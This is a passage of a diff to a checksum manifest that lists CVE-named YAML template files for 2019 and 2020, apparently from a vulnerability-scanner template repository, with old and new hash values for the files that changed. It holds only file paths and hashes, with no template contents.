+http/cves/2019/CVE-2019-7192.yaml:47efc5c532e8e185900dbae350d30c4d0b70427a http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca -http/cves/2019/CVE-2019-7254.yaml:ad24fea4ae2fba5b3c90618326513bdb5dfbedde -http/cves/2019/CVE-2019-7255.yaml:7d5d2e3b98102930733a586a1d1ec088282a2f6f -http/cves/2019/CVE-2019-7256.yaml:9b36f3e017eda1de90ee67a0baee734e31ca1fdb +http/cves/2019/CVE-2019-7254.yaml:ce982df8b2ba519921e2f3e175b0b5d1fe334379 +http/cves/2019/CVE-2019-7255.yaml:d07ccc6177536230ee73d422525433676603588a +http/cves/2019/CVE-2019-7256.yaml:6e0fa5602a538ad7d4e010a92af55b49da04a590 http/cves/2019/CVE-2019-7275.yaml:d251cbfb5bcd0cef05eae4ca47c159d2b03ce132 http/cves/2019/CVE-2019-7315.yaml:aef603a42e387838d30064359e8f376292d8c488 -http/cves/2019/CVE-2019-7481.yaml:7e3ebd3190512ff8d2949cb3522a11884b3e75c4 +http/cves/2019/CVE-2019-7481.yaml:2ea1b058d51f439f3d2fb43df75aeb85929ca738 http/cves/2019/CVE-2019-7543.yaml:03e4e0a5e50bfb20f17e3b446c41035f56d6351a http/cves/2019/CVE-2019-7609.yaml:429a7deb4d729e22c14cd66db90f7cbad01564f0 -http/cves/2019/CVE-2019-8086.yaml:6e201e44c80550e4981fc22cfaee801272cfe385 +http/cves/2019/CVE-2019-8086.yaml:e06bff8d3d335370a1b5ffd8c64dd0c144447f49 http/cves/2019/CVE-2019-8390.yaml:b18016f9d895afdb0c2dc81ff8ac484b845f0caf -http/cves/2019/CVE-2019-8442.yaml:b145c1968834d349dd2e15e465f121fc34f686ea -http/cves/2019/CVE-2019-8446.yaml:1762b98d29b72640f5ceac6c8b71d157d54904b3 -http/cves/2019/CVE-2019-8449.yaml:62a9df63a8563c26c81bc4978531c3cc168cb9fd -http/cves/2019/CVE-2019-8451.yaml:814f3f055c890bf9f2018767b4db70a623fb351c -http/cves/2019/CVE-2019-8903.yaml:187c434537693e85a8ff134a9c6ce0fd2912ebae -http/cves/2019/CVE-2019-8937.yaml:66e792ae741558c01f8137916f06d27e7262cfe9 +http/cves/2019/CVE-2019-8442.yaml:478eb203c8c14804d4ac9d7995ca162ab96e9d9d +http/cves/2019/CVE-2019-8446.yaml:1a36a151cee74fac964a82aaef0fd54e5e28be28 +http/cves/2019/CVE-2019-8449.yaml:8b8b01f595b9589b8d72e05463e8de2ea9710943 +http/cves/2019/CVE-2019-8451.yaml:706ff06da35369205762fb3058ff5ebef1bc5641 +http/cves/2019/CVE-2019-8903.yaml:22f8df41b441ff54035d803ba5ff18fb325d758f +http/cves/2019/CVE-2019-8937.yaml:20e197326287893df3caffeb30d577056726fd51 http/cves/2019/CVE-2019-8982.yaml:d345b49353e77db87682e091eba0c1668e5a374f http/cves/2019/CVE-2019-9041.yaml:1acd718661ba2a770f36087b628c659c058bf16c http/cves/2019/CVE-2019-9618.yaml:d1d4515fdd132e8704aa3ad89f97f9a3840d2503 -http/cves/2019/CVE-2019-9632.yaml:0274c217e1647f506915d7c84cdb5f792287060b -http/cves/2019/CVE-2019-9670.yaml:4c5ad92a6cda1072215f60d63717521d9b552b44 +http/cves/2019/CVE-2019-9632.yaml:02602f031e8743db5dfb75e665c44634d83d0709 +http/cves/2019/CVE-2019-9670.yaml:fe6cb7b1f07545677c4107d26c9ffb779e99cbfe http/cves/2019/CVE-2019-9726.yaml:dc39e85dbbe5056aae9925c7a68be4767ff3992c http/cves/2019/CVE-2019-9733.yaml:2caf78cb597139c1a3db12a011f7f9ba6e94ac68 http/cves/2019/CVE-2019-9915.yaml:939eceb6822e8651b5daaf3085bdcc1d35e434d6 http/cves/2019/CVE-2019-9922.yaml:6c85785266eba7189ac1457d23b0473f33cf9440 http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 -http/cves/2019/CVE-2019-9978.yaml:888dc6e81557675a2255e20d09d22c709863eede +http/cves/2019/CVE-2019-9978.yaml:d1db71fee79ff1f91a2fce54d373dc5f869b0dd1 http/cves/2020/CVE-2020-0618.yaml:ba66da0763579b0aea33e37bd6b9124cc35a7419 -http/cves/2020/CVE-2020-10148.yaml:bbb610b4e3403659c5f171819c0cace86262e009 +http/cves/2020/CVE-2020-10148.yaml:5e1d5f205bebdf43f0dc8a3b08f1040306c3820d http/cves/2020/CVE-2020-10199.yaml:b93ee10549d24ac7a2207b525846b37e90c70ee4 -http/cves/2020/CVE-2020-10220.yaml:13edb444acc4430103a4f7f6a84f10602f89fe79 +http/cves/2020/CVE-2020-10220.yaml:d7d6bdbb881296ba829db6c5ab88292bda2801e8 http/cves/2020/CVE-2020-10546.yaml:4cbf1b7e152d7cffe84df5feef391dfcd46438dc http/cves/2020/CVE-2020-10547.yaml:153c1b664b9491f7fcbc530feba3ba406b13deb0 -http/cves/2020/CVE-2020-10548.yaml:f37fec2174247354f9753fa6a2925047d2f69cc1 +http/cves/2020/CVE-2020-10548.yaml:1ca076762ecdfb68722bd82fe70de9a37290f805 http/cves/2020/CVE-2020-10549.yaml:7ff911d067ec6f0bde4ba6edfb5b609001870243 -http/cves/2020/CVE-2020-10770.yaml:ff35530145e876517077a4de00cb01f674d6c6b9 -http/cves/2020/CVE-2020-10973.yaml:72c3a72495f9675d3b99f4e5e6ca8f29d30fd265 -http/cves/2020/CVE-2020-11034.yaml:a825664c651e60f532af8d3c14610eea3f429d62 -http/cves/2020/CVE-2020-11110.yaml:fadc703ac41b35d8a1e87e554e36848674bdd6af +http/cves/2020/CVE-2020-10770.yaml:1510723af2d7bf6f8ea46a2ed1f1897a7bb35bbd +http/cves/2020/CVE-2020-10973.yaml:91c309859a6100f36677ad1faa7dcd44c7f0a80b +http/cves/2020/CVE-2020-11034.yaml:64a6a2b1401ef5e6826449f64e51e6bdd724f1a9 +http/cves/2020/CVE-2020-11110.yaml:4bee93e2b1ef0d5d8187adea946cb1b2f0f77a75 http/cves/2020/CVE-2020-11450.yaml:09220519d0db5db7c2a93fc06f80c6dae4f839ea http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 http/cves/2020/CVE-2020-11530.yaml:80c9a47fde950d0a147cd5759e76fb36f9ddf865 -http/cves/2020/CVE-2020-11546.yaml:b2084708702133ce517eb71887809b459689f93a -http/cves/2020/CVE-2020-11547.yaml:b146bb73841f6b4ee326a5509431fbb9548396db +http/cves/2020/CVE-2020-11546.yaml:4e71f1f66429ee58c8fe34c2bac3b1a03b25a98c +http/cves/2020/CVE-2020-11547.yaml:ffc1acf2e4ae8224e43441763456ff257e6ea530 http/cves/2020/CVE-2020-11710.yaml:328459cf74b245b08f305b4da5b937778d78e9bd http/cves/2020/CVE-2020-11738.yaml:26bc4a13b4dc75ef0ff4c86b0551736ad7ab0953 -http/cves/2020/CVE-2020-11798.yaml:754b954dee6c994a9f0aa84d27acb9cec98af47d +http/cves/2020/CVE-2020-11798.yaml:6b948b01867198571682067a8b3371c78005206e http/cves/2020/CVE-2020-11853.yaml:d688b8bf64d257892f84464396a6a1b56df47ddd http/cves/2020/CVE-2020-11854.yaml:5b340b27bcee9e4e2a7bee5aa5e6849caabfbcdd -http/cves/2020/CVE-2020-11930.yaml:860f6680f4695f1feb7ab31de46449255ceece0a -http/cves/2020/CVE-2020-11978.yaml:6e72db28c07f184db4aee35e022988d897584841 -http/cves/2020/CVE-2020-11991.yaml:de4b0a2b5977855bfe63b173a4a4edb7e2e7316e +http/cves/2020/CVE-2020-11930.yaml:1a728e85f4d61b33bfb23dc5980fa2507ce87b2d +http/cves/2020/CVE-2020-11978.yaml:cad582b4036a6df51fcc561cfecd7db9a9442f59 +http/cves/2020/CVE-2020-11991.yaml:94da65cc79b05554185653e3f75a1cdb4fb8e374 http/cves/2020/CVE-2020-12054.yaml:ccce337032ce9b12fe10efc5dcc4ca9b081e6ae9 http/cves/2020/CVE-2020-12116.yaml:996d7d30601cb3ab87713f51cb15b93d59f28a74 http/cves/2020/CVE-2020-12124.yaml:c60dc6e91d9b585c32fa85b3fa435122369080e9 -http/cves/2020/CVE-2020-12127.yaml:b60eab474bcfed827e783af39373f85fe9bb441f -http/cves/2020/CVE-2020-12256.yaml:939117d118c605aef9190c382e1aed61ece2af4e -http/cves/2020/CVE-2020-12259.yaml:fb372d0d4ec478378350cf8e844bbeac9e75b0cf +http/cves/2020/CVE-2020-12127.yaml:6aa88d338e060fd4e33efa8399b364dae2f83eb5 +http/cves/2020/CVE-2020-12256.yaml:64874ffe435cb495873609acac32b605e8ff4eb5 +http/cves/2020/CVE-2020-12259.yaml:aa74ee196be1180fa2550ca01f7765c8bd076660 http/cves/2020/CVE-2020-12447.yaml:25dca8fa73cb9a731e02a12b840d047144d60d13 http/cves/2020/CVE-2020-12478.yaml:6f8ebabd8a4a0df0eaaf7ebb99dbb706121d2418 -http/cves/2020/CVE-2020-12720.yaml:c7b69aea19ee132d50d7d92cd71b9bb38d56a390 +http/cves/2020/CVE-2020-12720.yaml:c5c91d7325a1a7eb6014c07cde1d5c5bb0b14d6b http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c http/cves/2020/CVE-2020-13117.yaml:115011fc3689582aab5176d3b93c0353c5f68a58 http/cves/2020/CVE-2020-13121.yaml:93e5a3ab99c0ba9e334c2e082b4d38fb250b69ac http/cves/2020/CVE-2020-13158.yaml:e519e5f44d47a168e7e54bd2a643040f87a12587 http/cves/2020/CVE-2020-13167.yaml:ec08b3533526649fedf57311f268a9ffe02111c0 http/cves/2020/CVE-2020-13258.yaml:4c4cb4659c8f357321d694522d65826a3acf4bd1 -http/cves/2020/CVE-2020-13379.yaml:39b1b8be9597f4b7462ed539822547363be526c3 -http/cves/2020/CVE-2020-13405.yaml:f1b58b0c636370023d623a044ba4d3efea0ace21 +http/cves/2020/CVE-2020-13379.yaml:2820dbaa66121c7e3c6115760e9fb75588fa6003 +http/cves/2020/CVE-2020-13405.yaml:0ba40701113be721e9cca6b5b42c9a3c97e698b9 http/cves/2020/CVE-2020-13483.yaml:32a74a6fa8b6e7d0be4e1dd3ba8e4ece9b9c8690 -http/cves/2020/CVE-2020-13638.yaml:6e6e5cd076e33bed8d1286c075b177ef15e0faf1 -http/cves/2020/CVE-2020-13700.yaml:33340a13d53c725023e61b3a6a08233a924c9584 -http/cves/2020/CVE-2020-13820.yaml:11f946bd8460d570a9261e70c95e2d4926e26f20 -http/cves/2020/CVE-2020-13851.yaml:cd0d582d6ac0937cb331cc5ce7c672d8554dc097 -http/cves/2020/CVE-2020-13927.yaml:091aa2c66d885bf9cac55fc9df4015d6dd8ca3a0 +http/cves/2020/CVE-2020-13638.yaml:48aa4df4ae54bc69916fdf286abcbb6da317ab63 +http/cves/2020/CVE-2020-13700.yaml:573ab040755ea90fab3532427a607dacc48f1cec +http/cves/2020/CVE-2020-13820.yaml:9ead5e8c55f1677640032c495aba8b97f1520c5c +http/cves/2020/CVE-2020-13851.yaml:b0aaa611cf376803194425f64d1194997a6679a9 +http/cves/2020/CVE-2020-13927.yaml:1aa87ed72734899bc9f7d8da3cd672b314ab50cb http/cves/2020/CVE-2020-13937.yaml:7384b1f6df654558f2d75603bda7d6645e672099 http/cves/2020/CVE-2020-13942.yaml:0b3b785fa8404e80153dc4a82d8a016e432b4d4e -http/cves/2020/CVE-2020-13945.yaml:52eb28eaa2b449d7e0d7589e9c1a074379330d3c +http/cves/2020/CVE-2020-13945.yaml:4e2a855203d2304b296e48c2b4831a400b12fce4 http/cves/2020/CVE-2020-14092.yaml:75a0892c9809a6c1abd7e4cc3d799a44cb88399d -http/cves/2020/CVE-2020-14144.yaml:71a68a2ba690ba91b57b5a841b65063acf027bf6 -http/cves/2020/CVE-2020-14179.yaml:02650cac88b4b63facf059a03d70b38a454a5f4e -http/cves/2020/CVE-2020-14181.yaml:c8c6b6dcfd2a9d5fa3e6d18f0f360d3b13e0a4f3 -http/cves/2020/CVE-2020-14408.yaml:38404424dc18ecb1567f9616b870eac945064f4f +http/cves/2020/CVE-2020-14144.yaml:40caded9d510c89dd60c068f2d35258fa61eea2e +http/cves/2020/CVE-2020-14179.yaml:c96861afb0638a5ccff8a5f97ad52af592818064 +http/cves/2020/CVE-2020-14181.yaml:429c35b952adca9f03ce7adc7a5d5e519dd18fcc +http/cves/2020/CVE-2020-14408.yaml:cdc423a5df8c799fb72233d65d63b4f2147cb2f2 http/cves/2020/CVE-2020-14413.yaml:bd2640f4d67b741a9ca405cacbafdb65d02d6a61 -http/cves/2020/CVE-2020-14750.yaml:f93fa338bc9aff0897db541ccfe290675a38d5a3 +http/cves/2020/CVE-2020-14750.yaml:74bbe1301a9d4ce274fb4c8c3ffd793ed5c57ac4 http/cves/2020/CVE-2020-14864.yaml:02384242a01304c27bfc479d385b6a8b345e51e5 -http/cves/2020/CVE-2020-14882.yaml:1274cc4f172ee44d08fcaed8b0cb877b0ead846f -http/cves/2020/CVE-2020-14883.yaml:157377c7b25c726f3522c40bca02085f454b39c0 -http/cves/2020/CVE-2020-15050.yaml:ff53982b1660dbacf0082093c19954ccd1597228 -http/cves/2020/CVE-2020-15129.yaml:fe1867b21cf9670f45b1adf0da114bb61e374bd4 +http/cves/2020/CVE-2020-14882.yaml:fd57473728b6ac18da7e1cc57f68d1d0a4ab2414 +http/cves/2020/CVE-2020-14883.yaml:2ea22351fa23ffe398bdf5233c92e21ce1890f2f +http/cves/2020/CVE-2020-15050.yaml:04471bb70d0132626229e681c0f49c1d3a33fdd4 +http/cves/2020/CVE-2020-15129.yaml:5fb2f2fdeedf32e502818d6d1942e061099ca0b6 http/cves/2020/CVE-2020-15148.yaml:1818ce67c964234a5007c23b04a0bf8972c127b2 -http/cves/2020/CVE-2020-15227.yaml:3399ba0c6fff5fe804a1613132ead0c946fb0728 +http/cves/2020/CVE-2020-15227.yaml:1f64993dd98b122b7288808fbf39cd7cc6362dc5 http/cves/2020/CVE-2020-15500.yaml:75f7b62a818f3845bb533cfbb29cf78bdff68d95 http/cves/2020/CVE-2020-15505.yaml:e6a491c737cc161a2f84ccf4adebee81a745337b http/cves/2020/CVE-2020-15568.yaml:0884dd4a2c77ae056269ca663d8253757fd049bb -http/cves/2020/CVE-2020-15867.yaml:2d45f24936bc47c49c09b9f7ff40ab464df08931 -http/cves/2020/CVE-2020-15895.yaml:38869acd8fa5e6b059565ad54e6fee143f41abb9 +http/cves/2020/CVE-2020-15867.yaml:04b7c79525241dcc482ef77b35f66e63ddbb9efd +http/cves/2020/CVE-2020-15895.yaml:fda89e314831219a21bce628e22bfb1a0fe5bb58 http/cves/2020/CVE-2020-15920.yaml:b9bce590c1d6a4a2950e930ec84e5bd343fd1cf1 http/cves/2020/CVE-2020-16139.yaml:d6f5ca556451807e2d514d69af0ec61298cf723d http/cves/2020/CVE-2020-16846.yaml:56d1ad720f2676a700fe9fcbdd8621a5f3538796 @@ -1782,43 +1782,43 @@ http/cves/2020/CVE-2020-17362.yaml:73c86a5a4a59e4f50fa8943fc437acfef4d14c78 http/cves/2020/CVE-2020-17453.yaml:09430bfffaa517528900fefef8ab4890595a7c6c http/cves/2020/CVE-2020-17456.yaml:36bc3b3b798495d74160cedf8747faf400c93ad1 http/cves/2020/CVE-2020-17463.yaml:9f44d84da08522dba61582a66775eafae5f8c65e -http/cves/2020/CVE-2020-17496.yaml:10f0b2f5ddd4b1e70c2be7e8a9b3e117e4b69ee7 +http/cves/2020/CVE-2020-17496.yaml:561344ac87ec46e1e6dce6f78065c6da7fc3b848 http/cves/2020/CVE-2020-17505.yaml:98f54ae7112117d8e7d0c1513d751e16279e93a5 http/cves/2020/CVE-2020-17506.yaml:2f42db756532bb7ed6eccaa22dc4196fb4e41c4a http/cves/2020/CVE-2020-17518.yaml:d81d48cbbd5df9824834f232c4c3ee0ecbe19d6f http/cves/2020/CVE-2020-17519.yaml:8b707e9dceb3975811ea8078b618c9e5d26819e7 -http/cves/2020/CVE-2020-17526.yaml:5266ff4a738dc93c9723af9e13d42a9178387ef7 -http/cves/2020/CVE-2020-17530.yaml:dca2405f9cd4e46c7ef764be6e4f7c8a3a81bb8b +http/cves/2020/CVE-2020-17526.yaml:e12cb3eb5c2d400e46318eda43860b8a3f7f938e +http/cves/2020/CVE-2020-17530.yaml:93faa23ee61dcd6a38d69a5dec4a449d117d6a97 http/cves/2020/CVE-2020-18268.yaml:6fd016f916dccfaa0d8a8ba365b143966bab3b49 -http/cves/2020/CVE-2020-19282.yaml:d7d60fd2197a68c7de77f8bbf6f166bdc977124b +http/cves/2020/CVE-2020-19282.yaml:46af0c971b5fee4d62b3f666c6a1252c3add5c50 http/cves/2020/CVE-2020-19283.yaml:23c95bd3067b4da3a55e3410e3658758b7aa4fd9 -http/cves/2020/CVE-2020-19295.yaml:60d3dd84486b18da0358042732bec6e88c6cc771 +http/cves/2020/CVE-2020-19295.yaml:5f6cb196c425b308cc93c0b4532a3b531e42883a http/cves/2020/CVE-2020-19360.yaml:9886ca3068574343a897d86700121d2f07afc83d -http/cves/2020/CVE-2020-1943.yaml:4b0f1287b33da1578b3f6e95a602925dfa15c05f +http/cves/2020/CVE-2020-1943.yaml:45ee2e1f0fecb046981a8b7dc97c96bc48cbaaad http/cves/2020/CVE-2020-19515.yaml:b59aebca0899304e6542d3c0bf42356d86a38d46 http/cves/2020/CVE-2020-1956.yaml:e39efd627a666be39c486b9aeeaa316d2795d820 http/cves/2020/CVE-2020-19625.yaml:c838f4924ba3563572ed00d81634424490d317b4 http/cves/2020/CVE-2020-20285.yaml:e6ca53b6da7cd8dd11006df026e5fc078a0aa084 -http/cves/2020/CVE-2020-20300.yaml:3364cc2abdd56679c558378f729b5e1f602b557b -http/cves/2020/CVE-2020-2036.yaml:5aa5c433b3ca32d9b8ce53aba859d520db030498 -http/cves/2020/CVE-2020-2096.yaml:aaa5c06f47b830ac7c52a31212f767151e078a05 +http/cves/2020/CVE-2020-20300.yaml:8436961998dba358c46ebe65b0858f77870f1f62 +http/cves/2020/CVE-2020-2036.yaml:99b334e4c49c7966e1bfb717f636251a20f0fac0 +http/cves/2020/CVE-2020-2096.yaml:c7f9febba3f35b0a85bb0528999a2772c9c9f334 http/cves/2020/CVE-2020-20982.yaml:538d3beb3a9976144b2a6a10e8fa30af220dd0d4 http/cves/2020/CVE-2020-20988.yaml:639c85d1714dbddbfd9e4b8db0fbce4a5ac90b54 http/cves/2020/CVE-2020-21012.yaml:03a5be731cfd6bf8b8e6d82c5ee1aded97e6e695 -http/cves/2020/CVE-2020-2103.yaml:6340b06f77e921e1b4c2fcf58c6f7119fec5faee -http/cves/2020/CVE-2020-21224.yaml:9215850ea5836ba8924a9492ebfdd2f6a56e0ecb +http/cves/2020/CVE-2020-2103.yaml:aac48cef0b9227ae1772c6a46a4994d0f8f42518 +http/cves/2020/CVE-2020-21224.yaml:e12fa6cfa215ced531fed8d2a61e88f38f51503b http/cves/2020/CVE-2020-2140.yaml:278c2662d3e3830d9336cb5c74086e11b5e9c97e -http/cves/2020/CVE-2020-22208.yaml:2e9b83fc8a0ee7227ee868b6df9ccb784c640d7f -http/cves/2020/CVE-2020-22209.yaml:a0db814438b2e60b811804f05fd222ad59ae0c65 -http/cves/2020/CVE-2020-22210.yaml:3b5e8ebc6acfc8fa158efffc8f06523b00d952c3 -http/cves/2020/CVE-2020-22211.yaml:f879a2c4d79aa01c1792e457a0d9b44a9888c361 -http/cves/2020/CVE-2020-22840.yaml:6c6cad1388bb2ab7192fec9a483e3a8f3edb4547 +http/cves/2020/CVE-2020-22208.yaml:4b1fbb91ff66485a0c78db828d739baf83b50860 +http/cves/2020/CVE-2020-22209.yaml:641ede936256f31c294c4cf42e9741e06ec154c3 +http/cves/2020/CVE-2020-22210.yaml:40b4a4080a2c3d0088a9e75e0926302ccadc5d6e +http/cves/2020/CVE-2020-22211.yaml:13b7e1e245ab3a6b3b0a5cf5e472c8517e6beb2b +http/cves/2020/CVE-2020-22840.yaml:fd20c29f3c2e3f1b304385b8d2a39acd74d0b8cf http/cves/2020/CVE-2020-23015.yaml:ef79be791a7a626c839061dcf881161a0234c38e -http/cves/2020/CVE-2020-23517.yaml:7f6751c9864765646315890d0899439d10142df9 +http/cves/2020/CVE-2020-23517.yaml:9d46cea677bc6757b61dfecfc4521ab2bff2ce43 http/cves/2020/CVE-2020-23575.yaml:67ab082068717a9921ae80d3394859c74d1398ac http/cves/2020/CVE-2020-23697.yaml:ad5a719d4e93a26db478bd8c3f4245db3515b06e http/cves/2020/CVE-2020-23972.yaml:c1383a5e782d88347b1ace6499e3c8e148aad5c4 -http/cves/2020/CVE-2020-24148.yaml:828c203ffd58618490347102066f2f539d9116af +http/cves/2020/CVE-2020-24148.yaml:2166a7a89e8a518ea044c158a832614622e7326b http/cves/2020/CVE-2020-24186.yaml:25250262fde4e0a9d147c93c2f88bd9cbb775129 http/cves/2020/CVE-2020-24223.yaml:3dcce16e9d8be524d4f16ebc04564135e16a5df3 http/cves/2020/CVE-2020-24312.yaml:c504548af3d920be3be02e59c790bd7690154549 @@ -1827,137 +1827,137 @@ http/cves/2020/CVE-2020-24550.yaml:df5052c65b1037f38f8ed25cb384ec4c54f81b8c http/cves/2020/CVE-2020-24571.yaml:5c31b80a9c7ae3e327ea91a5112b930676527155 http/cves/2020/CVE-2020-24579.yaml:62759de772a6d5027e0dcdd5964ce4cc03194022 http/cves/2020/CVE-2020-24589.yaml:9fdcb854777f1f0f4db18d334f9c769384a71d5c -http/cves/2020/CVE-2020-24701.yaml:6782e29645189f99e7d44df42c067f0e0be0de46 -http/cves/2020/CVE-2020-24902.yaml:fb8e001d6a2081b3a0328a714577005efea05db6 -http/cves/2020/CVE-2020-24903.yaml:51a953c902a4c738e3a11a376fab3fd9baddbf16 +http/cves/2020/CVE-2020-24701.yaml:72f62ed57289c0eaee6203cfb0c75f10ee585fa0 +http/cves/2020/CVE-2020-24902.yaml:a7003733e9e19cf4e889f2d621b2761fa220b4d6 +http/cves/2020/CVE-2020-24903.yaml:9f1a921d6e793897af3a095d174799345de16ae1 http/cves/2020/CVE-2020-24912.yaml:9a5855c216f6eb711710ff74138e2d615ebe5cfd http/cves/2020/CVE-2020-24949.yaml:75e53db8ae949b1e8991bcf5b51fc2afd196c6bc http/cves/2020/CVE-2020-25078.yaml:d2e80d7483241efcdeaeec253eee58e18089501b http/cves/2020/CVE-2020-25213.yaml:2b4d15844a75b3c8b331efd61791d2a8cb3cf8e0 http/cves/2020/CVE-2020-25223.yaml:a3693fe0f645932d320d2ab0ff173c31744f0850 -http/cves/2020/CVE-2020-25495.yaml:046e0a535a8b9fd74f70e1ff2d90dbef6e20c658 +http/cves/2020/CVE-2020-25495.yaml:606d5253dc6408f705c9d4f97d1f0333ccaaa9b7 http/cves/2020/CVE-2020-25506.yaml:883657db91c0d3f56d9828180b950d477af18999 -http/cves/2020/CVE-2020-2551.yaml:e7b2ae758383e6f1d3f2de83a8b4d9c0fdb9aa73 +http/cves/2020/CVE-2020-2551.yaml:daf3a1a918c62522dae154b7d8df419632f60cec http/cves/2020/CVE-2020-25540.yaml:b982bfa81fcb18ff4ae12e6075875a032eac51a9 -http/cves/2020/CVE-2020-25780.yaml:3983db60c1ca28a8c7999041013ab96f5c896a9f -http/cves/2020/CVE-2020-25864.yaml:574a13cfef80f75cb0712172cc55e41cdbd495f1 +http/cves/2020/CVE-2020-25780.yaml:0b7ae61ccba1216ced95d406f7a4774c41fdb122 +http/cves/2020/CVE-2020-25864.yaml:ef1d0bdf192619ff4fd55b101d21ee562fd6c59d http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f -http/cves/2020/CVE-2020-26153.yaml:455c58760238ddd079e51172072ef963e95e58ec +http/cves/2020/CVE-2020-26153.yaml:21dc7d23c36be26e2831ae2e1d0ca233c07f99c6 http/cves/2020/CVE-2020-26214.yaml:c9550b0a95085975804bf0adf411947d89925d2e http/cves/2020/CVE-2020-26217.yaml:22e1a3fe2541425175198c852f37d342fbb87a0a http/cves/2020/CVE-2020-26248.yaml:7c31fd4f253b81b3afe18098ea3b7db896f1efd7 -http/cves/2020/CVE-2020-26258.yaml:da846b0baeb41eb83b4c8ac05986b1eb0be6a1af -http/cves/2020/CVE-2020-26413.yaml:d73538b5a598487cf0268b6b031b25613718f92f +http/cves/2020/CVE-2020-26258.yaml:65445abdce991db29cdff3a214f1b7d6de02911a +http/cves/2020/CVE-2020-26413.yaml:3a442a78ad2055750c946162d84ad691eeb84d6d http/cves/2020/CVE-2020-26876.yaml:cddbbb81ba783c1c427b257e9caae9d9c0fa976a http/cves/2020/CVE-2020-26919.yaml:1f958ae88864447bcb937900bf0a813a033204b5 http/cves/2020/CVE-2020-26948.yaml:513d547c9b9f5ef43299cb380687dd64caaced81 http/cves/2020/CVE-2020-27191.yaml:4de1b9dd94d0973bfb7b1e6315d254603c5f1765 -http/cves/2020/CVE-2020-2733.yaml:e85d06ccdfb80f6d6628798106813cb79aae0c9d +http/cves/2020/CVE-2020-2733.yaml:0db30c857faaa8bbcd5c33a59199f572fe7fd8de http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 -http/cves/2020/CVE-2020-27467.yaml:9a74107153a3d881f4de65787037fea872e05808 +http/cves/2020/CVE-2020-27467.yaml:8efad74b23003596aee3967337a4e7fcec8808ee http/cves/2020/CVE-2020-27481.yaml:4b32a25c1171a8bbe3a79021d69aa408eb6b4d5c http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:c92bb76888150f83b0a4abc33eead1b830d151e6 +http/cves/2020/CVE-2020-27838.yaml:83a5092db5dd741811145536f0cf338c655aea78 http/cves/2020/CVE-2020-27866.yaml:94e95838349bf47e7bf695cdad78c991d81b11f2 -http/cves/2020/CVE-2020-27982.yaml:c67891c33b8929528dcc5a271dc50dcf68efaf65 +http/cves/2020/CVE-2020-27982.yaml:ce058edc20e39bf356c706aaed2545ef6d168cb4 http/cves/2020/CVE-2020-27986.yaml:893336c14059a046c22f8cd517e66893d0139361 -http/cves/2020/CVE-2020-28185.yaml:ecfb9fcc4bbfe0937f6b99302979dec7dabc55f3 +http/cves/2020/CVE-2020-28185.yaml:0ee814dd16cc4fac25a5648ce8899fc50f774896 http/cves/2020/CVE-2020-28188.yaml:c0980bcbb94378ff28df21229115235308770f13 http/cves/2020/CVE-2020-28208.yaml:fcf8162a856d78d120573693438b0646df11a72c -http/cves/2020/CVE-2020-28351.yaml:16f3808bf7037eee165ff817b9032b07cff97715 -http/cves/2020/CVE-2020-28871.yaml:a26b9eec2511c2ca500ebccbad87e19d81fd69e6 -http/cves/2020/CVE-2020-28976.yaml:598019c32cb4b0e55d77f7c45f1ba39593debba3 +http/cves/2020/CVE-2020-28351.yaml:a98f322b54a1e5942f159de3dc8bba070461aebc +http/cves/2020/CVE-2020-28871.yaml:48d31e212277d0f900ab343d86a2d0c49846fa79 +http/cves/2020/CVE-2020-28976.yaml:4e0c3b33a77a97106b4ef3e5e6b03e07f8a07499 http/cves/2020/CVE-2020-29164.yaml:b22ac231890e04ebe3bd4842f48b8b75dfa68807 http/cves/2020/CVE-2020-29227.yaml:014575ac4dec53a13f8dd825cff7a84066f0ae9c http/cves/2020/CVE-2020-29284.yaml:80a4ee991c7571f79905e18861b3dd84a62689b5 -http/cves/2020/CVE-2020-29395.yaml:16cb6925395ccc7b50f83f03eaca8e71deaa0675 -http/cves/2020/CVE-2020-29453.yaml:36f8bba4fdee54e96e54f2132471c8bddf38fdb9 -http/cves/2020/CVE-2020-29583.yaml:0086f54be23a01d66cf70629291399c856783530 +http/cves/2020/CVE-2020-29395.yaml:7b4235a8a22ace79151a4e91d0c8a74e8c164de2 +http/cves/2020/CVE-2020-29453.yaml:a90ee47f4c92ec5f8af322024b22dfcdce58be47 +http/cves/2020/CVE-2020-29583.yaml:b66358499d1e694d26ea0a79763682ba96e42ec9 http/cves/2020/CVE-2020-29597.yaml:0784e4768d628b088948e4409de7690b6b28dc4c http/cves/2020/CVE-2020-3187.yaml:633d566201388dc1399f783b58cfc07f94d4aa51 http/cves/2020/CVE-2020-3452.yaml:4171936b0f65db2e31afd0b4a9157a048ec3eb91 http/cves/2020/CVE-2020-35234.yaml:59dfdc805ed104edcb3cd667ec5f602c0e594cb9 http/cves/2020/CVE-2020-35338.yaml:b9e1195c81bf31210947ca6f71147321930b90c1 -http/cves/2020/CVE-2020-35476.yaml:45668b616ae0a566d94ced220663dca18327b3b3 +http/cves/2020/CVE-2020-35476.yaml:771d47371846727ad50691d19e77068c987d2ddf http/cves/2020/CVE-2020-35489.yaml:950d6dbeed43968347cb9c634c5d4c3b3e0e2853 http/cves/2020/CVE-2020-35580.yaml:5ce1a1e4040aaa35ba363d08f013c0fe525534bb http/cves/2020/CVE-2020-35598.yaml:5e721e6213989f337663289eff70cf95418401a2 http/cves/2020/CVE-2020-35713.yaml:2da565a85a1f7e90b28df0608bf2b6c8832c23dd -http/cves/2020/CVE-2020-35729.yaml:c7598a948f72654439744155ace7dfe699bba00b +http/cves/2020/CVE-2020-35729.yaml:d5a2e6c5cab0042af2c388c6602ebf74d3132c4a http/cves/2020/CVE-2020-35736.yaml:496c42f5b621668efe592864a945cb3f45d73b8d 